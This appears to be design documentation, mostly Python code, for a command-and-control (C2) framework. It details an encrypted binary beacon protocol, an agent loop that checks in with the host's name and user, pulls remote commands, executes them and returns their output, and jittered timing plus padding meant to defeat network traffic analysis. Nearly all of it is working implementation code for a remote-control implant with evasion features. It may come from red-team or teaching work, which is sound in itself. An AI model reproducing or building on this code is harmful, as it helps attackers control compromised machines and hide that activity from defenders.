Protocol Overview
The C2 protocol uses a binary message format with encrypted payloads. All communication happens over HTTPS through a single /beacon endpoint, with agents initiating all connections to avoid firewall restrictions.
Each message is wrapped in a binary envelope with the following structure:
Wire format (7-byte header + body):
[ magic: 2B | version: 1B | length: 4B | nonce: 12B | ciphertext+tag ]
Struct format '!HBI': big-endian, uint16 + uint8 + uint32.
def pack(payload_dict: dict, key: bytes) -> bytes:
"""Serialise, encrypt, and frame a payload dict into a C2 envelope."""
if not payload_dict or not isinstance(payload_dict, dict):
raise ProtocolError("pack: payload_dict must be a non-empty dict")
try:
plaintext = json.dumps(payload_dict).encode('utf-8')
except (TypeError, ValueError) as e:
raise ProtocolError(f"pack: payload not JSON-serialisable: {e}") from e
# Apply padding before encryption to obscure plaintext length
profile = load_active_profile()
plaintext = pad(plaintext, profile.padding_min, profile.padding_max)
ciphertext_with_tag, nonce = encrypt(plaintext, key)
# nonce prepended to body so receiver can split at fixed offset [:12]
body = nonce + ciphertext_with_tag
header = struct.pack(HEADER_FORMAT, MAGIC, PROTOCOL_VERSION, len(body))
return header + body
def unpack(raw: bytes, key: bytes) -> dict:
"""Validate, decrypt, and deserialise a raw C2 envelope into a dict."""
if len(raw) < HEADER_SIZE:
raise ProtocolError(
f"unpack: too short for header — got {len(raw)}B, need {HEADER_SIZE}B"
)
try:
magic, version, body_length = struct.unpack(HEADER_FORMAT, raw[:HEADER_SIZE])
except struct.error as e:
raise ProtocolError(f"unpack: header unpack failed: {e}") from e
if magic != MAGIC:
raise ProtocolError(
f"unpack: bad magic — expected 0x{MAGIC:04X}, got 0x{magic:04X}"
)
if version != PROTOCOL_VERSION:
raise ProtocolError(
f"unpack: unsupported version 0x{version:02X}"
)
# Extract nonce and ciphertext from body
body = raw[HEADER_SIZE : HEADER_SIZE + body_length]
nonce = body[:NONCE_SIZE_BYTES]
ciphertext_with_tag = body[NONCE_SIZE_BYTES:]
plaintext = decrypt(ciphertext_with_tag, nonce, key)
plaintext = strip_padding(plaintext)
try:
payload_dict = json.loads(plaintext.decode('utf-8'))
except (json.JSONDecodeError, UnicodeDecodeError) as e:
raise ProtocolError(f"unpack: decrypted payload is not valid JSON: {e}") from e
return payload_dict
Header Fields:
magic (2 bytes): Protocol identifier (0xC2C2)
version (1 byte): Protocol version (0x01)
length (4 bytes): Length of body in bytes
Body Structure:
nonce (12 bytes): Random nonce for AES-GCM encryption
ciphertext+tag: Encrypted JSON payload with 16-byte authentication tag
The nonce is prepended to the body (not the header) so the receiver can easily extract it at a fixed offset without parsing the header structure.
Message Types
The protocol defines six message types:
MSG_CHECKIN = 'CHECKIN'
MSG_TASK_PULL = 'TASK_PULL'
MSG_TASK_RESULT = 'TASK_RESULT'
MSG_TASK_DISPATCH = 'TASK_DISPATCH'
MSG_HEARTBEAT = 'HEARTBEAT'
MSG_TERMINATE = 'TERMINATE'
CHECKIN
Direction: Agent → Server
Purpose: Register a new agent session
def build_checkin(hostname: str, username: str, os_info: str,
agent_ver: str, jitter_pct: int) -> dict:
"""Build a CHECKIN payload dict."""
msg = _base_payload(MSG_CHECKIN)
msg['payload'] = {
'hostname': hostname,
'username': username,
'os': os_info,
'agent_ver': agent_ver,
'jitter_pct': jitter_pct,
}
return msg
Response: Server assigns a session_id (UUID) and returns it to the agent.
TASK_PULL
Direction: Agent → Server
Purpose: Request next pending command
def build_task_pull(session_id: str) -> dict:
"""Build a TASK_PULL payload dict."""
msg = _base_payload(MSG_TASK_PULL, session_id=session_id)
msg['payload'] = {'session_id': session_id}
return msg
Response: Server responds with one of:
TASK_DISPATCH if a command is queued
TASK_PULL with status: no_task if queue is empty
TERMINATE if the session has been deactivated
TASK_DISPATCH
Direction: Server → Agent
Purpose: Send a command for execution
resp = mf._base_payload(mf.MSG_TASK_DISPATCH, session_id=session_id)
resp['payload'] = {
'task_id': task.task_id,
'command': task.command,
'args': task.args,
'timeout_s': task.timeout_s,
}
TASK_RESULT
Direction: Agent → Server
Purpose: Report command execution results
def build_task_result(session_id: str, task_id: str, stdout: str,
stderr: str, exit_code: int, duration_ms: int) -> dict:
"""Build a TASK_RESULT payload dict."""
msg = _base_payload(MSG_TASK_RESULT, session_id=session_id)
msg['payload'] = {
'task_id': task_id,
'stdout': stdout,
'stderr': stderr,
'exit_code': exit_code,
'duration_ms': duration_ms,
}
return msg
HEARTBEAT
Direction: Agent → Server (optional)
Purpose: Keep session alive without pulling tasks
TERMINATE
Direction: Server → Agent
Purpose: Instruct agent to shut down gracefully
The TERMINATE signal is sent when an operator deactivates a session. The agent receives it on the next beacon and calls sys.exit(0).
Base Payload Structure
All messages include mandatory fields:
def _base_payload(msg_type: str, session_id: str = None) -> dict:
"""Return mandatory fields present in every message."""
if msg_type not in VALID_MSG_TYPES:
raise ProtocolError(f"unknown msg_type '{msg_type}'")
return {
'msg_type': msg_type,
'session_id': session_id,
'timestamp': int(time.time()),
'nonce': uuid.uuid4().hex, # replay protection
'payload': {},
}
msg_type: One of the six defined message types
session_id: UUID assigned during CHECKIN (null for CHECKIN message)
timestamp: Unix timestamp when message was created
nonce: Random UUID hex string for replay protection
payload: Message-specific data
Beacon Loop
The agent’s main execution loop is implemented in the BeaconLoop class:
Checkin Phase
Main Loop
Task Execution
def _checkin(self) -> None:
# Send CHECKIN and store the session_id assigned by the server.
global logger
payload = _build_checkin_payload()
response = _send(payload, self._key)
self._session_id = (
response.get('session_id') or
response.get('payload', {}).get('session_id')
)
if not self._session_id:
raise TransportError(
'CHECKIN response missing session_id — server may have rejected checkin'
)
# Re-create logger with session_id so all subsequent logs are tagged
logger = update_session(logger, self._session_id)
logger.info('checkin complete', extra={
'session_id': self._session_id,
'hostname': platform.node(),
})
# Step 2 — main beacon loop
while True:
try:
# Step 2a — compute jittered sleep interval
sleep_s = self._sleep_fn(
config.BEACON_INTERVAL_S,
self._profile.jitter_pct,
)
# Step 2b — sleep then send TASK_PULL
jitter_s = round(sleep_s - config.BEACON_INTERVAL_S, 3)
logger.info('sleeping before beacon', extra={
'interval_s': round(sleep_s, 2),
'base_s': config.BEACON_INTERVAL_S,
'jitter_s': jitter_s,
'session_id': self._session_id,
})
time.sleep(sleep_s)
# Step 2c — send TASK_PULL
pull_payload = mf.build_task_pull(self._session_id)
response = _send(pull_payload, self._key)
msg_type = response.get('msg_type', '')
self._reset_backoff()
# Step 2d — task dispatched
if msg_type == mf.MSG_TASK_DISPATCH:
self._handle_task_dispatch(response)
# Step 2e — terminate signal
elif msg_type == mf.MSG_TERMINATE:
logger.info('TERMINATE received — shutting down', extra={
'session_id': self._session_id,
})
sys.exit(0)
# Step 2f — no task, continue loop
else:
logger.info('no task', extra={'session_id': self._session_id})
except TransportError as e:
# Back-off on network failures — do not crash the agent
logger.warning('transport error', extra={
'reason': str(e),
'session_id': self._session_id,
})
self._backoff_sleep(reason=str(e))
def _handle_task_dispatch(self, response: dict) -> None:
# Execute the dispatched task and send the result back to the server.
inner = response.get('payload', {})
task_id = inner.get('task_id', '')
command = inner.get('command', '')
args = inner.get('args', [])
timeout_s = inner.get('timeout_s', 30)
logger.info('task received', extra={
'task_id': task_id,
'command': command,
})
result = execute(task_id, command, args, timeout_s)
result_payload = mf.build_task_result(
session_id = self._session_id,
task_id = result.task_id,
stdout = result.stdout,
stderr = result.stderr,
exit_code = result.exit_code,
duration_ms = result.duration_ms,
)
_send(result_payload, self._key)
logger.info('task executed', extra={
'task_id': task_id,
'exit_code': result.exit_code,
'duration_ms': result.duration_ms,
})
Loop Flow:
- Sleep with jitter — Agent sleeps for
BEACON_INTERVAL_S ± jitter
- Send TASK_PULL — Agent requests next command from server
- Process response:
- If
TASK_DISPATCH: Execute command and send TASK_RESULT
- If
TERMINATE: Exit cleanly with sys.exit(0)
- If no task: Continue to next iteration
- Error handling:
- Network errors trigger exponential back-off
- Unexpected errors are logged but don’t crash the loop
Exponential Back-off
The agent implements retry logic with exponential back-off to handle network failures gracefully:
class BackoffManager:
# Manages exponential back-off state for retry logic
_SEQUENCE = [1, 2, 4, 8, 16, 32, 60] # delay steps in seconds, capped at 60
def __init__(self):
self.attempts = 0
def compute_delay(self) -> float:
# Return the delay for the current attempt, capped at the last sequence value.
return float(self._SEQUENCE[min(self.attempts, len(self._SEQUENCE) - 1)])
def reset(self) -> None:
# Reset attempt counter after a successful operation.
self.attempts = 0
Back-off Sequence: 1s → 2s → 4s → 8s → 16s → 32s → 60s (capped)
The back-off counter is reset after any successful beacon, preventing indefinite delays during normal operation.
Replay Protection
Each message includes a unique nonce (UUID) that the server stores and checks:
# Step 3 — nonce replay check
if not await db.check_and_store_nonce(nonce):
logger.warning('replay detected', extra={
'session_id': session_id,
'nonce': nonce,
})
return JSONResponse(status_code=409, content={'error': 'replay detected'})
If a nonce is seen twice, the server rejects the message with a 409 Conflict status code.
Why UUIDs for nonces?
UUIDs provide 122 bits of entropy (version 4), making collisions astronomically unlikely even with billions of messages. This eliminates the need for synchronized counters between agent and server.
Padding Strategy
To prevent traffic analysis based on message size, the protocol applies random padding before encryption:
# Apply padding before encryption to obscure plaintext length
profile = load_active_profile()
plaintext = pad(plaintext, profile.padding_min, profile.padding_max)
The padding is stripped after decryption, ensuring the receiver gets the original plaintext.
Padding obscures the true size of commands and results, making it harder for network observers to infer the type of activity occurring.